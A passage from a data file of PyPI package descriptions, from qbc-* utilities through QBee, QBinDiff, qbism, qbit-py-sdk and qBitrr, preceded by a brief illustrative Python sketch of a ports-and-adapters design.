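As an aside, the core-versus-infrastructure split described above is the classic ports-and-adapters idea. The sketch below is purely illustrative (none of these names come from qb-core-all) and only shows how a core module can stay free of infrastructure details while an infrastructure module supplies the concrete adapter.

```python
from typing import Protocol

# "Core" side: pure business logic, no infrastructure imports.
class OrderStore(Protocol):
    def save(self, order_id: str, payload: dict) -> None: ...

def place_order(store: OrderStore, order_id: str, payload: dict) -> str:
    # The business rule lives here; how the order is persisted is the adapter's job.
    if not payload:
        raise ValueError("empty order")
    store.save(order_id, payload)
    return order_id

# "Infrastructure" side: one concrete adapter (here just an in-memory dict).
class InMemoryOrderStore:
    def __init__(self):
        self.orders = {}
    def save(self, order_id, payload):
        self.orders[order_id] = payload

place_order(InMemoryOrderStore(), "o-1", {"sku": "cake", "qty": 2})
```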
Future versions will split core modules in a more granular scope to help implementers focus on specific modulessee documentation/packaging_concepts.md"} +{"package": "qbc-pminfo", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-qrcode", "pacakge-description": "generate a qrcode according input text"} +{"package": "qbc-speech", "pacakge-description": "Speech Recognition,voice2text,text2voice"} +{"package": "qbc-trans", "pacakge-description": "No description available on PyPI."} +{"package": "qbc-weather", "pacakge-description": "Get the weather forecast for the next 15 days"} +{"package": "qbdiff", "pacakge-description": "\u2728 pyqbdiff \u2728The python binding forqbdiffinstallpipinstallqbdiffUsagefromqbdiffimportcompute,patch,version,errorold=b\"1234\"new_=b\"123456\"compute(old,new_,\"diff_tmp.bin\")withopen(\"diff_tmp.bin\",\"rb\")asf:diff=f.read()patch(old,diff,\"new.bin\")withopen(\"new.bin\",\"rb\")asf:newf=f.read()assertnew_==newfuseQBDIFF_USE_CFFIenv var to specify a backendPublic functionsQBERR_BADCKSUM:intQBERR_BADPATCH:intQBERR_IOERR:intQBERR_LZMAERR:intQBERR_NOMEM:intQBERR_OK:intQBERR_SAIS:intQBERR_TRUNCPATCH:intdefversion()->str:...deferror(code:int)->str:...defcompute(old:bytes,new_:bytes,diff_file:str)->int:...defpatch(old:bytes,patch_:bytes,new_file:str)->int:...BuildTwo env var is needed to build,LIBandINCLUDE.LIBis the path of liblzma.lib/liblzma.so,\nandINCLUDEis the directory oflzma.hgitsubmoduleupdate--init--recursive\npythonsetup.pysdistbdist_wheel--use-cython--use-cffi"} +{"package": "qbeast-cli", "pacakge-description": "Qbeast CLIA command line interface to interact with the Qbeast services.Quick StartInstall the CLIpipinstallqbeast-cliLogin to the Qbeast ServicesqbeastloginQbeast Expo commandsRegister a datasetqbeastexpocreate\"My Share\"\"Sales Data\"s3a://my-bucket/my/table/pathaccount_idShare the dataset with peopleqbeastexpoinvite\"My Share\"\"Alice\"alice@somewhere.comQbeast Curator commands\u2139\ufe0f You must be in the root of your project, where youringestion/andtransformation/directories are.You can also use--path \"/path/to/project/\"option.Manage your projects in the Qbeast Curator.# Create a projectqbeastcuratorprojectcreate-p\"project-name\"# List the projectsqbeastcuratorprojectlist# Get info about a projectqbeastcuratorprojectinfo-p\"project-name\"# Update a project's descriptionqbeastcuratorprojectupdate-p\"project-name\"-D\"new description\"# Delete a projectqbeastcuratorprojectdelete-p\"project-name\"Manage the Snapshots of a Project.# Create a snapshot of the project & upload it to the Curatorqbeastcuratorsnapshotcreate-p\"project-name\"--path/path/to/your/project# List the snapshots of a Projectqbeastcuratorsnapshotlist-p\"project-name\"# Get info about a Snapshotqbeastcuratorsnapshotinfo-p\"project-name\"-s\"snapshot-id\"# Delete a snapshotqbeastcuratorsnapshotdelete-p\"project-name\"-s\"snapshot-id\"Manage the Deployments of a Project.# Create a Deployment of a Snapshotqbeastcuratordeploymentcreate-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# List the Deployments of a Projectqbeastcuratordeploymentlist-p\"project-name\"# Get info about a Deploymentqbeastcuratordeploymentinfo-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# Delete a Deploymentqbeastcuratordeploymentdelete-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"Manage the Runs of a Project# Start a run of a Deploymentqbeastcuratorrunstart-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# List the Runs of a 
Deploymentqbeastcuratorrunlist-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"# Get info about a Runqbeastcuratorruninfo-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"-r\"run-id\"# Delete a Runqbeastcuratorrundelete-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"-r\"run-id\"# Get the logs of a Runqbeastcuratorrunlogs-p\"project-name\"-s\"snapshot-id\"-d\"deployment-name\"-r\"run-id\""} +{"package": "qbeast-sharing", "pacakge-description": "Qbeast SharingWarning: This project is an experimental extension to Delta Sharing!This project has been created by forking the official Delta Sharing repository in order to introduce sampling pushdown to the python client.Qbeast Sharingextends theDelta Sharingopen protocol and adds the capabilities of sampling large datasets. Delta Sharing has been designed for secure real-time exchange of large datasets, which enables secure data sharing across different computing platforms. It lets organizations share access to existingDelta LakeandApache Parquettables with other organizations, who can then directly read the table in Pandas, Apache Spark, or any other software that implements the open protocol.This is the Python client library for Delta Sharing, which lets you load shared tables aspandasDataFrames or asApache SparkDataFrames if running in PySpark with theApache Spark Connector library.Installation and UsageInstall usingpip install qbeast-sharing.To use the Python Connector, seethe project docsfor details.DocumentationThis README only contains basic information about the Qbeast Sharing Python Connector. Please readthe project documentationfor full usage details."} +{"package": "qbee", "pacakge-description": "QBeeOnline playgroundTutorial in Jupyter(Colab)QBee is a Python library for transforming systems of differential equations into a systems with quadratic right-rand side.InstallationPyPIpip install qbeeManualClone repository:https://github.com/AndreyBychkov/QBee.gitOr, if you want our bleeding edge version, clonehttps://github.com/AndreyBychkov/QBee/tree/devChange directory:cd QBeeInstall package:pip install .If you usepoetryyou can alternately install if withpoetry installWhat is quadratization?The problem ofquadratizationis, given a system of ODEs with polynomial right-hand side, reduce the system to a\nsystem with quadratic right-hand side by introducing as few new variables as possible. We will explain it using toy\nexample. Consider the system$$\n\\begin{cases}\nx_1' = x_1 x_2 \\\nx_2' = -x_1 x_2^3\n\\end{cases}\n$$An example of quadratization of this system will be a singular vector of new variables$$\n[y' = x_2 y - 2y^2]\n$$leading to the following ODE$$\ny' = x_2 y - 2y^2\n$$Thus, we attained the system with quadratic right-hand side$$\n\\begin{cases}\nx_1' = x_1 x_2 \\\nx_2 ' = -x^2 y \\\ny' = x_2 y - 2y^2\n\\end{cases}\n$$We used only one new variable, so we achieved anoptimalquadratization.Qbee usageQBee implements algorithms thattakesystem of ODEs with elementary functions right-hand side andreturnoptimal monomial quadratization- optimal quadratization constructed from monomial substitutions.We will demonstrate usage of QBee on the example below. Other interactive examples you can find\ninexamples section.1. Importing QBeeQBee relies on Sympy for a high-level API.importsympyasspfromqbeeimport*2. 
System definitionFor example, we will take theA1system fromSwischuk et al.'2020$$\n\\begin{cases}\nc_1' = -A \\exp(-E_a / (R_u T)) c_1 ^{0.2} c_2^{1.3} \\\nc_2 ' = 2c_1' \\\nc_3' = -c_1' \\\nc_4' = -2 c_1'\n\\end{cases}\n$$The parameters in the system areA, Ea and Ru, and the others are either state variables or inputs.\nSo, let's define them with the system in code:A,Ea,Ru=parameters(\"A, Ea, Ru\")c1,c2,c3,c4,T=functions(\"c1, c2, c3, c4, T\")eq1=-A*sp.exp(-Ea/(Ru*T))*c1**0.2*c2**1.3system=[(c1,eq1),(c2,2*eq1),(c3,-eq1),(c4,-2*eq1)]3. Polynomialization and QuadratizationWhen we work with ODEs with the right-hand side being a general continuous function,\nwe utilize the following pipeline:Input system -> Polynomial System -> Quadratic Systemand the transformations are calledpolynomializationandquadratizationaccordingly.The example system is not polynomial, so we use the most general method for achieving optimal monomial quadratization.# {T: 2} means that T can have a derivative of order at most two => T''quadr_system=polynomialize_and_quadratize(system,input_der_orders={T:2})ifquadr_system:quadr_system.print()Sample output:Introduced variables:\nw_0 = exp(-Ea/(Ru*T))\nw_1 = c1**0.2\nw_2 = c2**1.3\nw_3 = w_0*w_1\nw_4 = T'/T**2\nw_5 = T**(-2)\nw_6 = T'/T\nw_7 = 1/T\nw_8 = w_0*w_1*w_2/c1\nw_9 = w_0*w_1*w_2/c2\n\nc1' = -A*w_2*w_3\nc2' = -2*A*w_2*w_3\nc3' = A*w_2*w_3\nc4' = 2*A*w_2*w_3\nw_0' = Ea*w_0*w_4/Ru\nw_1' = -A*w_1*w_8/5\nw_2' = -13*A*w_2*w_9/5\nw_3' = -A*w_3*w_8/5 + Ea*w_3*w_4/Ru\nw_4' = T''*w_5 - 2*w_4*w_6\nw_5' = -2*w_5*w_6\nw_6' = T''*w_7 - w_6**2\nw_7' = -w_6*w_7\nw_8' = 4*A*w_8**2/5 - 13*A*w_8*w_9/5 + Ea*w_4*w_8/Ru\nw_9' = -A*w_8*w_9/5 - 3*A*w_9**2/5 + Ea*w_4*w_9/RuIntroduced variables are the optimal monomial quadratization.PapersOptimal Monomial Quadratization for ODE systems:arxiv,SpringerCitationIf you find this code useful in your research, please consider citing the above paper that works best for you."}
+{"package": "qbeetle", "pacakge-description": "beetle (\u7532\u58f3\u866b)Introductionbeetle is a project development framework for PyQt and Pyside. It helps you quickly create, run and build projects,\nand it also ships a set of helper development tools to improve development efficiency.fbs is another framework: it provides a powerful environment for packaging, creating installers and signing applications. However, the open-source version of fbs only supports Python 3.6,\nso new Python features and many newer versions of packages and modules cannot be used. beetle aims to solve these problems and provides many new features. Thanks still go to fbs, which brings a lot of convenience to PyQt and Pyside project development; beetle borrows from fbs in many ways.Development planDevelop a tool, beetle, similar to fbs, expected to provide the following features:template_list: list the project templates in the resource libraryupdate_template: update the local project template library from Beetle's official project template libraryadd_template: add a new user-defined project template to Beetledelete_template: delete a user-defined project template from Beetlestartproject: create and initialize a projectconvert .ui files to .py filesgenerate the .ts files needed for internationalization (i18n)convert .ts files to .qmupdate .qrc filesconvert .qrc files to .py filesrun: run the application from sourcefreeze: compile the code into a standalone executable (PyInstaller or nuitka optional)installer: create an installer for the applicationtest: run automated tests (based on pytest)clean: delete previous build outputInstallationbeetle can be installed from PyPI via pip:pip install qbeetleDocumentationSee the beetle user documentation"}
+{"package": "qbert", "pacakge-description": "qbert: a dead simple task queue backed by postgres. Very informal testing suggests a max performance around 100 jobs per second per worker on my machine.usageadd qbert.piccolo_app to your APP_REGISTRY as per the documentation.see example.py for queue interaction examples."}
+{"package": "qbertclient", "pacakge-description": "Platform9 Qbert clientThis implementation of the Qbert client is an amalgam of various implementations in Platform9's internal tooling.\nAt the moment the goal is to get something out as quickly as possible.How to installpip install qbertclientUsagefrom qbertclient import qbert\n\nqb = qbert.Qbert(token, 'https:///qbert/v3/')The client also exposes a simple Keystone client which allows users to get a Keystone token:from qbertclient import qbert\nfrom qbertclient import keystone\n\ndu_fqdn = \"endpoint.platform9.net\"\nusername = \"username@platform9.net\"\npassword = \"hunter2\"\nproject_name = \"service\"\n\nks = keystone.Keystone(du_fqdn, username, password, project_name)\ntoken = ks.get_token()\nproject_id = ks.get_project_id(project_name)\n\nqb = qbert.Qbert(token, \"https://{}/qbert/v3/{}\".format(du_fqdn, project_id))\nprint(qb.list_clusters())"}
+{"package": "qbertconfig", "pacakge-description": "Fetches kubeconfig from qbert APIkubectl configcan be used to manage kubeconfig files. However,\ngathering a kubeconfig file for a Platform9 Managed Kubernetes cluster is\na manual process today. This aims to solve that problem by downloading\nand merging clusters' kubeconfigs with existing kubeconfig files.InstallationIt's strongly recommended to use a python virtualenvpipinstallqbertconfigUsageqc[-h][-kKUBECONFIG][--namecluster_name][--uuidcluster_uuid][-c]Supported Operationsfetch- get a kubeconfig for a PMK clusterhelp- show this messagelist-clusters- list available PMK clusters in the target Platform9 Managed CloudProviding CredentialsQbertconfig uses theOpenstack SDKto perform authentication against a\nPlatform9 Cloud. Credentials can be provided in either aclouds.yamlfile,\nenvironment variables, or by using the--oscommand-line arguments. 
For more\ninformation, please refer to theofficial documentationExamplesource~/openstack.rcqcfetch--namedev-cluster-kdev-cluster.kcfg.ymlexportKUBECONFIG=$(pwd)/dev-cluster.kcfg.ymlkubeconfiggetnodes--contextdev-clusterkubeconfiggetpods-nfooFor more information on openstack rc files and how to generate them, seeInstalling Openstack CLI Clients.TestingRunning Testspipinstall-rrequirements.txtnosetests-v-dtests/Lintingflake8--excludeversioneer.pyHow it worksHere is the basic structure of a Kubeconfig:apiVersion:v1kind:Configpreferences:{}current-context:defaultclusters:[]contexts:[]users:[]Each of cluster, context, or user, has anameassociated with it.\nThis is the unique identifier for each object, and each context uses\nthese names to tie it all together.Each of these sections can be managed with thekubectl configcommand. [Documentation]This utility will fetch a fresh kubeconfig from the Qbert API, and merge\nit\u2019s details into the specified kubeconfig.With the fresh kubeconfig, the following sections are renamed to resolve\ncommon collisions when managing many PMK clouds.useris renamed tofqdn-usernameto align with unique\nkeystone environmentscontextis renamed to thecluster_nameclusteris renamed to thecluster_uuid"} +{"package": "qbf-index", "pacakge-description": "Quotient Bloom FiltersQuotient Bloom Filters (QBFs) are a probabilistic data structure used to test if an element is a member of a set. They are a variant of the conventional Bloom Filter (BF) that incorporate a hierarchical level structure to improve the accuracy of membership queries.Conventional Bloom FilterConventional Bloom Filters (BFs) are used to determine whether an element is a member of a set or not. They work by hashing the element to a set of positions in an array of bits. If all the bits at these positions are set to 1, then the element is considered to be a member of the set. However, if any of the bits are set to 0, then the element is definitely not a member of the set. BFs are designed to minimize the number of false negatives, which occur when a member is incorrectly identified as not being part of the set. They do so at the cost of allowing for a certain number of false positives, which occur when a non-member is incorrectly identified as being part of the set.Quotient Bloom FilterQBFs improve upon BFs by incorporating a hierarchical level structure that allows for a more fine-grained control over the probability of false positives. QBFs introduce the concept of \"levels\" in which each level consists of a set of Bloom Filters that store the number of times an element has been inserted. The maximum number of times an element can be inserted in a level is equal to the number of levels, and the number of levels determines the total number of bits allocated to each element.To query if an element is in the set, the QBF checks if all the bits for the element are set to 1 in all the levels. If all the bits are set to 1, then the element is considered to be a member of the set. However, if any of the bits are set to 0, then the element is not a member of the set. The use of levels allows for more control over the false positive rate. The probability of a false positive depends on the number of levels and the number of times the element has been inserted. As the number of levels and the number of insertions increase, the probability of a false positive decreases.Level MechanismThe level mechanism works by allocating more bits to an element as it is inserted more times. 
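A toy sketch of this level mechanism may help; it is illustrative only (it is not the qbf-index implementation, and the hash construction here is an arbitrary choice), and it implements exactly the insert/query behaviour spelled out in the next few sentences.

```python
import hashlib

class LeveledBloomSketch:
    """Toy model of the level mechanism: one counter array per level."""

    def __init__(self, num_levels=3, size=1024, num_hashes=4):
        self.num_levels = num_levels
        self.size = size
        self.num_hashes = num_hashes
        self.levels = [[0] * size for _ in range(num_levels)]

    def _positions(self, item):
        # Derive num_hashes positions from a single digest (hash choice is arbitrary).
        digest = hashlib.sha256(item.encode("utf-8")).digest()
        return [int.from_bytes(digest[4 * i:4 * i + 4], "big") % self.size
                for i in range(self.num_hashes)]

    def insert(self, item):
        # Increment the item's positions in every level, capped at the number of levels.
        for level in self.levels:
            for pos in self._positions(item):
                level[pos] = min(level[pos] + 1, self.num_levels)

    def query(self, item):
        # Report membership only if every position is set in every level.
        return all(level[pos] > 0
                   for level in self.levels
                   for pos in self._positions(item))

qbf = LeveledBloomSketch()
qbf.insert("token-42")
print(qbf.query("token-42"), qbf.query("unseen-token"))  # True False (barring a false positive)
```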
When an element is inserted, its hash values are computed and the corresponding bits in the bit array are incremented by 1 in all the levels. The maximum value for each bit is equal to the number of levels. When an element is queried for membership, the QBF checks if all the bits for the element are set to 1 in all the levels. If any of the bits are set to 0, the QBF returns that the element is not in the set.Use Case within Large Language Model GenerationQBFs can be used as an efficient mechanism for indexing and searching the massive data sets required for the training of large language models. These data sets consist of billions of tokens, and the use of conventional data structures can be prohibitive in terms of memory requirements and computational complexity. By using QBFs, the size of the index can be reduced by several orders of magnitude while maintaining a high level of accuracy in the search results. The hierarchical level structure allows for a more fine-grained control over the false positive rate, which is critical in ensuring the accuracy of the search results. Overall, QBFs provide an efficient and effective solution for indexing and searching massive data sets required for the training of large language models."} +{"package": "qbidolet-02-mai", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qbindiff", "pacakge-description": "QBinDiffQBinDiff is an experimental binary diffing tool addressing the diffing as aNetwork Alignement Quadratic Problem.But why developing yet another differ when Bindiff works well?Bindiff is great, no doubt about it, but we have no control on the diffing process. Also, it works\ngreat on standard binaries but it lacks flexibility on some corner-cases (embedded firmwares,\ndiffing two portions of the same binary etc...).A key idea of QBinDiff is enabling tuning the diffingprogrammaticallyby:writing its own featurebeing able to enforce some matchesemphasizing either on the content of functions (similarity) or the links between them (callgraph)In essence, the idea is to be able to diff by defining its own criteria which sometimes, is not the\ncontrol-flow and instructions but could for instance, be data-oriented.Last, QBinDiff as primarily been designed with the binary-diffing use-case in mind, but it can be\napplied to various other use-cases like social-networks. Indeed, diffing two programs boils down to\ndetermining the best alignment of the call graph following some similarity criterion.Indeed, solving this problem is APX-hard, that why QBinDiff uses a machine learning approach (more\nprecisely optimization) to approximate the best match.Like Bindiff, QBinDiff also works using an exported disassembly of program obtained from IDA.\nOriginally usingBinExport, it now also supportQuokkaas backend, which extracted files, are\nmore exhaustive and also more compact on disk (good for large binary dataset).[!NOTE]\nQBinDiff is an experimental tool for power-user where many parameters, features, thresholds\nor weights can be adjusted. Obtaining good results usually requires tuning these parameters.(Please note that QBinDiff does not intend to be faster than other differs, but rather being more flexible.)[!WARNING]\nQBinDiff graph alignment is very memory intensive (compute large matrices), it can fill RAM if not cautious.\nTry not diffing binaries larger than +10k functions. 
For large program use very high sparsity ratio (0.99).DocumentationThe documentation can be found on thediffing portalor can be manually built withpip install .[doc]\ncd doc\nmake htmlBelow you will find some sections extracted from the documentation. Please refer to the full\ndocumentation in case of issues.InstallationQBinDiff can be installed through pip with:pip install qbindiffAs some part of the algorithm are very CPU intensive the installation\nwill compile some components written in native C/C++.As depicted above, QBinDiff relies on some projects (also developed at Quarkslab):python-binexport, wrapper on the BinExport protobuf format.python-bindiff, wrapper around bindiff (used to write results as Bindiff databases)Quokka, another binary exported based on IDA. Faster than binexport and more exhaustive (thus diffing more relevant)Usage (command line)After installation, the binaryqbindiffis available in the path.\nIt takes in input two exported files and start the diffing analysis. The result can then\nbe exported in a BinDiff file format.\nThe default format for input files isBinExport,\nfor a complete list of backend loader look at the-l1, --loader1option in the help.\nThe complete command line options are:Usage: qbindiff [OPTIONS] \n\n QBinDiff is an experimental binary diffing tool based on machine learning technics, namely Belief propagation.\n\nOptions:\n -l1, --loader1 Loader type to be used for the primary. Must be one of these ['binexport', 'quokka',\n 'ida'] [default: binexport]\n -l2, --loader2 Loader type to be used for the secondary. Must be one of these ['binexport', 'quokka',\n 'ida'] [default: binexport]\n -f, --feature Features to use for the binary analysis, it can be specified multiple times.\n Features may be weighted by a positive value (default 1.0) and/or compared with a\n specific distance (by default the option -d is used) like this ::.\n For a list of all the features available see --list-features.\n -n, --normalize Normalize the Call Graph (can potentially lead to a partial matching). [default\n disabled]\n -d, --distance The following distances are available ['canberra', 'euclidean', 'cosine',\n 'jaccard_strong'] [default: canberra]\n -s, --sparsity-ratio FLOAT Ratio of least probable matches to ignore. Between 0.0 (nothing is ignored) to 1.0\n (only perfect matches are considered) [default: 0.75]\n -sr, --sparse-row Whether to build the sparse similarity matrix considering its entirety or processing\n it row per row\n -t, --tradeoff FLOAT Tradeoff between function content (near 1.0) and call-graph information (near 0.0)\n [default: 0.75]\n -e, --epsilon FLOAT Relaxation parameter to enforce convergence [default: 0.5]\n -i, --maxiter INTEGER Maximum number of iteration for belief propagation [default: 1000]\n -e1, --executable1 PATH Path to the primary raw executable. Must be provided if using quokka loader\n -e2, --executable2 PATH Path to the secondary raw executable. Must be provided if using quokka loader\n -o, --output PATH Write output to PATH\n -ff, --file-format [bindiff] The file format of the output file. Supported formats are [bindiff] [default:\n bindiff]\n -v, --verbose Activate debugging messages. Can be supplied multiple times to increase verbosity\n --version Show the version and exit.\n --arch-primary TEXT Force the architecture when disassembling for the primary. Format is\n 'CS_ARCH_X:CS_MODE_Ya,CS_MODE_Yb,...'\n --arch-secondary TEXT Force the architecture when disassembling for the secondary. 
Format is\n 'CS_ARCH_X:CS_MODE_Ya,CS_MODE_Yb,...'\n --list-features List all the available features\n -h, --help Show this message and exit.Library usageThe strength of qBinDiff is to be usable as a python library. The following snippet shows an example\nof loading to binexport files and to compare them using the mnemonic feature.fromqbindiffimportQBinDiff,Programfromqbindiff.featuresimportWeisfeilerLehmanfrompathlibimportPathp1=Program(Path(\"primary.BinExport\"))p2=Program(Path(\"secondary.BinExport\"))differ=QBinDiff(p1,p2)differ.register_feature_extractor(WeisfeilerLehman,1.0,distance='cosine')differ.process()mapping=differ.compute_matching()output={(match.primary.addr,match.secondary.addr)formatchinmapping}Contributing & ContributorsAny help, or feedback is greatly appreciated via Github issues, pull requests.Current:Robin DavidRiccardo MoriRoxane CohenPast:Alexis ChallandeElie MenginAll contributions"} +{"package": "qbiome", "pacakge-description": "Info:Draft link will be posted hereAuthor:ZeD@UChicagoDescription:Application of quasinets (https://pypi.org/project/quasinet/) for microbiome analysis for learning rules of organization, maturation, competition and succession in microbiome ecosystems.Documentation:https://zeroknowledgediscovery.github.io/qbiome/qbiome/index.htmlUsage:import qbiome\nfrom qbiome.data_formatter import DataFormatter\nfrom qbiome.quantizer import Quantizer\nfrom qbiome.qnet_orchestrator import QnetOrchestrator\nfrom qbiome.forecaster import Forecaster"} +{"package": "qbirthday", "pacakge-description": "QBirthday is a birthday reminder status icon.FeaturesSeveral backends available (CSV file, Lightning, MySQL databse).Extendable to other backends.iCalendar export.RequirementsQBirthday runs on Python >= 3.7.It requires PyQt5 and optionally depends on mysqlclient if a MySQL database is used as backend.InstallationEither as root or in a Python virtual environment:$ pip install qbirthdayTo use MySQL backend, install mysqlclient:$ pip install mysqlclientHistoryQBirthday is a Qt port of GBirthday, a GTK application.Project linksPyPI:https://pypi.python.org/pypi/marshmallowChangelog:https://github.com/lafrech/qbirthday/blob/master/CHANGELOG.rstIssues:https://github.com/lafrech/qbirthday/issuesLicenseQBirthday is distributed under GPLv2 license (see LICENSE file)."} +{"package": "qbism", "pacakge-description": "QBismpython tools for the budding quantum bettabilitarianInstallationpip install qbismNote thatqbismrelies onqutip!UsageLet's start off with a random density matrix:from qbism import *\nimport qutip as qt\nimport numpy as np\n\nd = 2\nrho = qt.rand_dm(d)We construct a random Weyl-Heisenberg IC-POVM, and get the magical quantum coherence matrix. 
We find the probabilities with respect to this POVM.povm = weyl_heisenberg_povm(qt.rand_ket(d))\nphi = povm_phi(povm)\np = dm_probs(rho, povm)\nprint(\"probs: %s\" % p)probs: [0.20215649 0.20215649 0.29784351 0.29784351]We can compare the classical probabilities (for a Von Neumann measurement after a POVM measurement whose outcome we are ignorant of) to the quantum probabilities (in the case where we go directly to the Von Neumann measurement):H = qt.rand_herm(d)\nvn = [v*v.dag() for v in H.eigenstates()[1]]\n\nclassical_probs = conditional_probs(vn, povm) @ p\nquantum_probs = conditional_probs(vn, povm) @ phi @ p\n\nprint(\"classical probs: %s\" % classical_probs)\nprint(\"quantum probs: %s\" % quantum_probs)\n\npost_povm_rho = sum([(e*rho).tr()*(e/e.tr()) for e in povm])\nassert np.allclose(classical_probs, [(v*post_povm_rho).tr() for v in vn])\nassert np.allclose(quantum_probs, [(v*rho).tr() for v in vn])classical probs: [0.55802905 0.44197095]\nquantum probs: [0.65778315 0.34221685]Now let's get a SIC-POVM and explore time evolution:sic = sic_povm(d)\nsic_phi = povm_phi(sic)\nsic_p = dm_probs(rho, sic)\n\nU = qt.rand_unitary(d)\nevolved_sic = [U*e*U.dag() for e in sic]\nR = conditional_probs(evolved_sic, sic).T\n\ntime_evolved_sic_p = R @ sic_phi @ sic_p\nprint(\"time evolved probs: %s\" % time_evolved_sic_p)\nassert np.allclose(dm_probs(U*rho*U.dag(), sic), time_evolved_sic_p)time evolved probs: [0.20445193 0.20445193 0.29554807 0.29554807]We could also use:time_evolved_sic_p2 = povm_map([U], sic) @ sic_phi @ sic_p\nassert np.allclose(time_evolved_sic_p, time_evolved_sic_p2)Finally, let's check out partial traces:entangled = qt.rand_dm(4)\nentangled.dims = [[2,2],[2,2]]\n\npovm2 = weyl_heisenberg_povm(qt.rand_ket(2))\npovm4 = apply_dims(weyl_heisenberg_povm(qt.rand_ket(4)), [2,2])\nphi = povm_phi(povm4)\np = dm_probs(entangled, povm4)\n\nptrA = povm_map(partial_trace_kraus(0, [2,2]), povm4, povm2)\nptrB = povm_map(partial_trace_kraus(1, [2,2]), povm4, povm2)\n\nassert np.allclose(dm_probs(entangled.ptrace(0), povm2), ptrA @ phi @ p)\nassert np.allclose(dm_probs(entangled.ptrace(1), povm2), ptrB @ phi @ p)Check out the tutorial for the full story!Thanks tonbdev!"}
+{"package": "qbit", "pacakge-description": "No description available on PyPI."}
+{"package": "qbit-py-sdk", "pacakge-description": "qbit-python-sdkQbit conceptsThe developer API is intended to let enterprises integrate with the Qbit system and easily make it part of their workflow. The API lets developers use the Global Account and Quantum Card products, among others.Project statusThe current version, 1.0.0, is an official release. For now only the auth-related endpoints are supported; the remaining endpoints will be completed later. The SDK also provides the Post, put, delete and get requests needed by the Qbit API, so that users can more conveniently call the other endpoints; see the code samples below for details.Note: merchants' technical staff should pay attention to the correctness and compatibility of their systems and software, and to the risks involved, when using the SDK.RequirementsPython 3.7+InstallationThe latest version has been published on PyPI.pip install qbit-py-sdkorpipenv install qbit-py-sdkUsageimportqbit_py_sdkasQbitqbit=Qbit.QbitClient(\"qbit1f6efee44ceb8ca2\",\"8f70d42a1393802aebf567be27a47879\",\"https://api-global.qbitnetwork.com\")GlossaryClient: at Qbit, a partner is called a Client.Account: at Qbit, a partner's customer is called an Account.clientId: the merchant id; contact us to apply for one.clientSecret: the merchant secret, used for signing; contact us to apply for one.Getting startedGet an access tokencodeRes=qbit.get_code(state='324',redirect_uri='')res=qbit.get_access_token(codeRes.code)print(res)Refresh an access tokenres=qbit.refresh_access_token(\"refreshToken\")print(res)Example of calling other endpoints# a response status between 200 and 300 means the request succeededparams={\"id\":\"5d890eda-16aa-4760-90af-3d60837f5616\",\"limit\":10}res=qbit.config(\"access_token\").get_request(\"https://api-global.qbitnetwork.com/open-api/v1/budget\",**params)Encrypting/decrypting sensitive informationEncryption with HmacSHA256fromqbit_py_sdkimportencryptHmacSHA256data={\"id\":\"ee74c872-8173-4b67-81b1-5746e7d5ab88\",\"accountId\":None,\"holderId\":\"d2bd6ab3-3c28-4ac7-a7c4-b7eed5eee367\",\"currency\":\"USD\",\"settlementCurrency\":None,\"counterparty\":\"SAILINGWOOD;;US;1800948598;;091000019\",\"transactionAmount\":11,\"fee\":0,\"businessType\":\"Inbound\",\"status\":\"Closed\",\"transactionTime\":\"2021-11-22T07:34:10.997Z\",\"transactionId\":\"124d3804-defa-4033-9f30-1d8b0468e506\",\"clientTransactionId\":None,\"createTime\":\"2021-11-22T07:34:10.997Z\",\"appendFee\":0,}res=encryptHmacSHA256(\"25d55ad283aa400af464c76d713c07ad\",**data)print(res==\"8287d5539c03918c9de51176162c2bf7065d5a8756b014e3293be1920c20d102\")Contact usIf you find a bug or have any questions or suggestions, please open an issue to give us feedback. You are also welcome to visit our official website."}
+{"package": "qBitrr", "pacakge-description": "A simple script to monitorQbitand communicate withRadarrandSonarrJoin theOfficial Discord Serverfor help.FeaturesMonitor qBit for Stalled/bad entries and delete them then blacklist them on Arrs (Option to also trigger a re-search action).Monitor qBit for completed entries and tell the appropriate Arr instance to import it ( 'DownloadedMoviesScan' or 'DownloadedEpisodesScan' commands).Skip files in qBit entries by extension, folder or regex.Monitor the completed folder and clean it up.Usesffprobeto ensure downloaded entries are valid media.Trigger periodic Rss Syncs on the appropriate Arr instances.Trigger Queue update on appropriate Arr instances.Search requests fromOverseerrorOmbi.Auto add/remove trackersSet per tracker valuesThis section requires the Arr databases to be locally available.Monitor Arr's databases to trigger missing episode searches.Customizable year range to search for (at a later point will add more options here, for example search whole series/season instead of individual episodes, search by name, category etc).Important mentionsSome things to know before using it.Qbitrr works best with qBittorrent 4.3.9You need to run theqbitrr --gen-configcommand and move the generated file 
to~/.config/qBitManager/config.toml(~ is your home directory, i.eC:\\Users\\{User})I haveSonarrandRadarrboth setup to add tags to all downloads.I have qBit setup to have to create sub-folder for downloads and for the download folder to\nuse subcategories.Install the requirements runpython -m pip install qBitrr(I would recommend in a dedicatedvenvbut that's out of scope.Alternatively:Download on thelatest releaseRun the scriptMake sure to update the settings in~/.config/qBitManager/config.tomlActivate your venvRunqbitrrAlternatively:Unzip the downloaded release and run itHow to update the scriptActivate your venvRunpython -m pip install -U qBitrrAlternatively:Download on thelatest releaseContributionsI'm happy with any PRs and suggested changes to the logic I just put it together dirty for my own use case.Example behaviourDocker ImageThe docker image can be foundhereDocker 